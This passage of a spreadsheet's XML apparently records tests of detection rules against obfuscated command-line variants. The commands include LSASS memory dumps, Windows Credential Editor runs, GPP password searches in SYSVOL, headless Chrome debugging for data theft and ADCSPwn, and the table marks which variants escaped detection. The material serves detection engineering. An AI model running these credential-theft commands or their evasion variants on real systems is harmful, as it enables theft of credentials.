(9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1855" s="44" t="n"/>
      <c r="K1855" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1856" ht="15.75" customHeight="1" s="42">
      <c r="A1856" s="44" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B1856" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_wce</t>
        </is>
      </c>
      <c r="C1856" s="44" t="inlineStr">
        <is>
          <t>HackTool - Windows Credential Editor (WCE) Execution</t>
        </is>
      </c>
      <c r="D1856" s="44" t="inlineStr">
        <is>
          <t>7aa7009a-28b9-4344-8c1f-159489a390df</t>
        </is>
      </c>
      <c r="E1856" s="44" t="inlineStr">
        <is>
          <t>wce.exe -S</t>
        </is>
      </c>
      <c r="F1856" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1856" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1856" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1856" s="44" t="n"/>
      <c r="J1856" s="44" t="n"/>
      <c r="K1856" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1857" ht="15.75" customHeight="1" s="42">
      <c r="A1857" s="44" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B1857" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_wce</t>
        </is>
      </c>
      <c r="C1857" s="44" t="inlineStr">
        <is>
          <t>HackTool - Windows Credential Editor (WCE) Execution</t>
        </is>
      </c>
      <c r="D1857" s="44" t="inlineStr">
        <is>
          <t>7aa7009a-28b9-4344-8c1f-159489a390df</t>
        </is>
      </c>
      <c r="E1857" s="44" t="inlineStr">
        <is>
          <t>wce.exe "-S"</t>
        </is>
      </c>
      <c r="F1857" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1857" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1857" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1857" s="44" t="n"/>
      <c r="J1857" s="44" t="n"/>
      <c r="K1857" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1858" ht="15.75" customHeight="1" s="42">
      <c r="A1858" s="44" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B1858" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_wce</t>
        </is>
      </c>
      <c r="C1858" s="44" t="inlineStr">
        <is>
          <t>HackTool - Windows Credential Editor (WCE) Execution</t>
        </is>
      </c>
      <c r="D1858" s="44" t="inlineStr">
        <is>
          <t>7aa7009a-28b9-4344-8c1f-159489a390df</t>
        </is>
      </c>
      <c r="E1858" s="44" t="inlineStr">
        <is>
          <t>wce.exe  -S</t>
        </is>
      </c>
      <c r="F1858" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1858" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1858" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1858" s="44" t="n"/>
      <c r="J1858" s="44" t="n"/>
      <c r="K1858" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1859" ht="15.75" customHeight="1" s="42">
      <c r="A1859" s="44" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B1859" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_wce</t>
        </is>
      </c>
      <c r="C1859" s="44" t="inlineStr">
        <is>
          <t>HackTool - Windows Credential Editor (WCE) Execution</t>
        </is>
      </c>
      <c r="D1859" s="44" t="inlineStr">
        <is>
          <t>7aa7009a-28b9-4344-8c1f-159489a390df</t>
        </is>
      </c>
      <c r="E1859" s="44" t="inlineStr">
        <is>
          <t>wce.exe -S -g</t>
        </is>
      </c>
      <c r="F1859" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1859" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1859" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1859" s="44" t="n"/>
      <c r="J1859" s="44" t="n"/>
      <c r="K1859" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1860" ht="15.75" customHeight="1" s="42">
      <c r="A1860" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1860" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1860" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1860" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1860" s="44" t="inlineStr">
        <is>
          <t>secedit.exe "/configure" "/db" mytemplate.db</t>
        </is>
      </c>
      <c r="F1860" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1860" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1860" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1860" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J1860" s="44" t="n"/>
      <c r="K1860" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1861" ht="15.75" customHeight="1" s="42">
      <c r="A1861" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1861" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1861" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1861" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1861" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c secedit.exe /conf^igure /db mytemplate.db</t>
        </is>
      </c>
      <c r="F1861" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1861" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1861" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1861" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J1861" s="44" t="n"/>
      <c r="K1861" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1862" ht="15.75" customHeight="1" s="42">
      <c r="A1862" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1862" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1862" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1862" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1862" s="44" t="inlineStr">
        <is>
          <t>secedit.exe /EXPORT /AREAS SECURITYPOLICY /CFG output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F1862" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1862" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1862" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1862" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J1862" s="44" t="n"/>
      <c r="K1862" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1863" ht="15.75" customHeight="1" s="42">
      <c r="A1863" s="44" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B1863" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_debugging</t>
        </is>
      </c>
      <c r="C1863" s="44" t="inlineStr">
        <is>
          <t>Potential Data Stealing Via Chromium Headless Debugging</t>
        </is>
      </c>
      <c r="D1863" s="44" t="inlineStr">
        <is>
          <t>3e8207c5-fcd2-4ea6-9418-15d45b4890e4</t>
        </is>
      </c>
      <c r="E1863" s="44" t="inlineStr">
        <is>
          <t>"chrome.exe" --remote-debugging-address=127.0.0.1 --headless --user-data-dir="C:\\Users\\User\\AppData\\Local\\Google\\Chrome\\User Data"</t>
        </is>
      </c>
      <c r="F1863" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1863" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1863" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1863" s="44" t="n"/>
      <c r="J1863" s="44" t="n"/>
      <c r="K1863" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1864" ht="15.75" customHeight="1" s="42">
      <c r="A1864" s="44" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B1864" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_debugging</t>
        </is>
      </c>
      <c r="C1864" s="44" t="inlineStr">
        <is>
          <t>Potential Data Stealing Via Chromium Headless Debugging</t>
        </is>
      </c>
      <c r="D1864" s="44" t="inlineStr">
        <is>
          <t>3e8207c5-fcd2-4ea6-9418-15d45b4890e4</t>
        </is>
      </c>
      <c r="E1864" s="44" t="inlineStr">
        <is>
          <t>"chrome.exe" --headless --user-data-dir="C:\\Users\\User\\AppData\\Local\\Google\\Chrome\\User Data" --remote-debugging-port=0x1234</t>
        </is>
      </c>
      <c r="F1864" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1864" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1864" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1864" s="44" t="n"/>
      <c r="J1864" s="44" t="n"/>
      <c r="K1864" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1865" ht="15.75" customHeight="1" s="42">
      <c r="A1865" s="44" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B1865" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C1865" s="44" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D1865" s="44" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E1865" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files\Google\Chrome\Application\chrome.exe"	--remote-debugging-address=127.0.0.1 --remote-debugging-port=9222</t>
        </is>
      </c>
      <c r="F1865" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1865" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1865" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1865" s="44" t="n"/>
      <c r="J1865" s="44" t="n"/>
      <c r="K1865" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1866" ht="15.75" customHeight="1" s="42">
      <c r="A1866" s="44" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B1866" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C1866" s="44" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D1866" s="44" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E1866" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-de^bugging-address=127.0.0.1 --remote-de^bugging-port=9222</t>
        </is>
      </c>
      <c r="F1866" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1866" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1866" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1866" s="44" t="n"/>
      <c r="J1866" s="44" t="n"/>
      <c r="K1866" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1867" ht="15.75" customHeight="1" s="42">
      <c r="A1867" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B1867" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C1867" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D1867" s="44" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E1867" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" "-u" "-f" C:\Users\thaim\AppData\Local\Temp\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F1867" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1867" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1867" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1867" s="44" t="n"/>
      <c r="J1867" s="44" t="n"/>
      <c r="K1867" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1868" ht="15.75" customHeight="1" s="42">
      <c r="A1868" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B1868" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C1868" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D1868" s="44" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E1868" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" --full --name C:\Users\thaim\AppData\Local\Temp\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F1868" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1868" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1868" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1868" s="44" t="n"/>
      <c r="J1868" s="44" t="n"/>
      <c r="K1868" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1869" ht="15.75" customHeight="1" s="42">
      <c r="A1869" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B1869" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C1869" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D1869" s="44" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E1869" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" -^u -^f C:\Users\thaim\AppData\Local\Temp\dotnet-lsass.dmp 788"</t>
        </is>
      </c>
      <c r="F1869" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1869" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1869" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1869" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump (515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J1869" s="44" t="n"/>
      <c r="K1869" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1870" ht="15.75" customHeight="1" s="42">
      <c r="A1870" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B1870" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C1870" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D1870" s="44" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E1870" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe"	-u	-f	C:\Users\thaim\AppData\Local\Temp\dotnet-lsass.dmp	788</t>
        </is>
      </c>
      <c r="F1870" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1870" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1870" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1870" s="44" t="n"/>
      <c r="J1870" s="44" t="n"/>
      <c r="K1870" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1871" ht="15.75" customHeight="1" s="42">
      <c r="A1871" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B1871" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_execution</t>
        </is>
      </c>
      <c r="C1871" s="44" t="inlineStr">
        <is>
          <t>DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D1871" s="44" t="inlineStr">
        <is>
          <t>dee0a7a3-f200-4112-a99b-952196d81e42</t>
        </is>
      </c>
      <c r="E1871" s="44" t="inlineStr">
        <is>
          <t>DumpMinitool.exe "Full" 788 C:\Temp\dump.dmp</t>
        </is>
      </c>
      <c r="F1871" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1871" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1871" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1871" s="44" t="n"/>
      <c r="J1871" s="44" t="n"/>
      <c r="K1871" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1872" ht="15.75" customHeight="1" s="42">
      <c r="A1872" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B1872" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_execution</t>
        </is>
      </c>
      <c r="C1872" s="44" t="inlineStr">
        <is>
          <t>DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D1872" s="44" t="inlineStr">
        <is>
          <t>dee0a7a3-f200-4112-a99b-952196d81e42</t>
        </is>
      </c>
      <c r="E1872" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c DumpMinitool.exe F^ull 788 C:\Temp\dump.dmp</t>
        </is>
      </c>
      <c r="F1872" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1872" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1872" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1872" s="44" t="n"/>
      <c r="J1872" s="44" t="n"/>
      <c r="K1872" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1873" ht="15.75" customHeight="1" s="42">
      <c r="A1873" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B1873" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_execution</t>
        </is>
      </c>
      <c r="C1873" s="44" t="inlineStr">
        <is>
          <t>DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D1873" s="44" t="inlineStr">
        <is>
          <t>dee0a7a3-f200-4112-a99b-952196d81e42</t>
        </is>
      </c>
      <c r="E1873" s="44" t="inlineStr">
        <is>
          <t>DumpMinitool.exe  Full 788 C:\Temp\dump.dmp</t>
        </is>
      </c>
      <c r="F1873" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1873" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1873" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1873" s="44" t="n"/>
      <c r="J1873" s="44" t="n"/>
      <c r="K1873" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1874" ht="15.75" customHeight="1" s="42">
      <c r="A1874" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B1874" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C1874" s="44" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D1874" s="44" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E1874" s="44" t="inlineStr">
        <is>
          <t>C:\Temp\TrolleyExpress.exe	764</t>
        </is>
      </c>
      <c r="F1874" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1874" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1874" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1874" s="44" t="n"/>
      <c r="J1874" s="44" t="n"/>
      <c r="K1874" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1875" ht="15.75" customHeight="1" s="42">
      <c r="A1875" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B1875" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C1875" s="44" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D1875" s="44" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E1875" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Temp\TrolleyExpress.exe 000764</t>
        </is>
      </c>
      <c r="F1875" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1875" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1875" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1875" s="44" t="n"/>
      <c r="J1875" s="44" t="n"/>
      <c r="K1875" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1876" ht="15.75" customHeight="1" s="42">
      <c r="A1876" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B1876" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C1876" s="44" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D1876" s="44" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E1876" s="44" t="inlineStr">
        <is>
          <t>C:\Temp\TrolleyExpress.exe -ma	764</t>
        </is>
      </c>
      <c r="F1876" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1876" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1876" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1876" s="44" t="n"/>
      <c r="J1876" s="44" t="n"/>
      <c r="K1876" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1877" ht="15.75" customHeight="1" s="42">
      <c r="A1877" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1877" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_gpp_passwords</t>
        </is>
      </c>
      <c r="C1877" s="44" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords</t>
        </is>
      </c>
      <c r="D1877" s="44" t="inlineStr">
        <is>
          <t>91a2c315-9ee6-4052-a853-6f6a8238f90d</t>
        </is>
      </c>
      <c r="E1877" s="44" t="inlineStr">
        <is>
          <t>findstr /S cpassword \\THAIMX\sysvol\\*.xml</t>
        </is>
      </c>
      <c r="F1877" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1877" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1877" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1877" s="44" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords (91a2c315-9ee6-4052-a853-6f6a8238f90d)</t>
        </is>
      </c>
      <c r="J1877" s="44" t="n"/>
      <c r="K1877" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1878" ht="15.75" customHeight="1" s="42">
      <c r="A1878" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1878" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lsass</t>
        </is>
      </c>
      <c r="C1878" s="44" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1878" s="44" t="inlineStr">
        <is>
          <t>fe63010f-8823-4864-a96b-a7b4a0f7b929</t>
        </is>
      </c>
      <c r="E1878" s="44" t="inlineStr">
        <is>
          <t>findstr -i LSASS</t>
        </is>
      </c>
      <c r="F1878" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1878" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1878" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1878" s="44" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE (fe63010f-8823-4864-a96b-a7b4a0f7b929)</t>
        </is>
      </c>
      <c r="J1878" s="44" t="n"/>
      <c r="K1878" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1879" ht="15.75" customHeight="1" s="42">
      <c r="A1879" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1879" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C1879" s="44" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1879" s="44" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E1879" s="44" t="inlineStr">
        <is>
          <t>icacls "C:\Program Files\*" 2&gt;nul | findstr (M) | findstr Everyone</t>
        </is>
      </c>
      <c r="F1879" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1879" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1879" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1879" s="44" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE (47e4bab7-c626-47dc-967b-255608c9a920)</t>
        </is>
      </c>
      <c r="J1879" s="44" t="n"/>
      <c r="K1879" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1880" ht="15.75" customHeight="1" s="42">
      <c r="A1880" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1880" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C1880" s="44" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1880" s="44" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E1880" s="44" t="inlineStr">
        <is>
          <t>icacls "C:\Program Files\*" 2&gt;nul | findstr -i EVERYONE</t>
        </is>
      </c>
      <c r="F1880" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1880" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1880" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1880" s="44" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE (47e4bab7-c626-47dc-967b-255608c9a920)</t>
        </is>
      </c>
      <c r="J1880" s="44" t="n"/>
      <c r="K1880" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1881" ht="15.75" customHeight="1" s="42">
      <c r="A1881" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B1881" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_sysvol_access</t>
        </is>
      </c>
      <c r="C1881" s="44" t="inlineStr">
        <is>
          <t>Suspicious SYSVOL Domain Group Policy Access</t>
        </is>
      </c>
      <c r="D1881" s="44" t="inlineStr">
        <is>
          <t>05f3c945-dcc8-4393-9f3d-af65077a8f86</t>
        </is>
      </c>
      <c r="E1881" s="44" t="inlineStr">
        <is>
          <t>dir \\domain.local\SYSVOL/domain.local/policies/</t>
        </is>
      </c>
      <c r="F1881" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1881" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1881" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1881" s="44" t="n"/>
      <c r="J1881" s="44" t="n"/>
      <c r="K1881" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1882" ht="15.75" customHeight="1" s="42">
      <c r="A1882" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B1882" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_adcspwn</t>
        </is>
      </c>
      <c r="C1882" s="44" t="inlineStr">
        <is>
          <t>HackTool - ADCSPwn Execution</t>
        </is>
      </c>
      <c r="D1882" s="44" t="inlineStr">
        <is>
          <t>cd8c163e-a19b-402e-bdd5-419ff5859f12</t>
        </is>
      </c>
      <c r="E1882" s="44" t="inlineStr">
        <is>
          <t>ADCSPwn.exe  --adcs  ca.domain.local  --port  443</t>
        </is>
      </c>
      <c r="F1882" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1882" s="44" t="b">
        <v>0</v>
      </c>
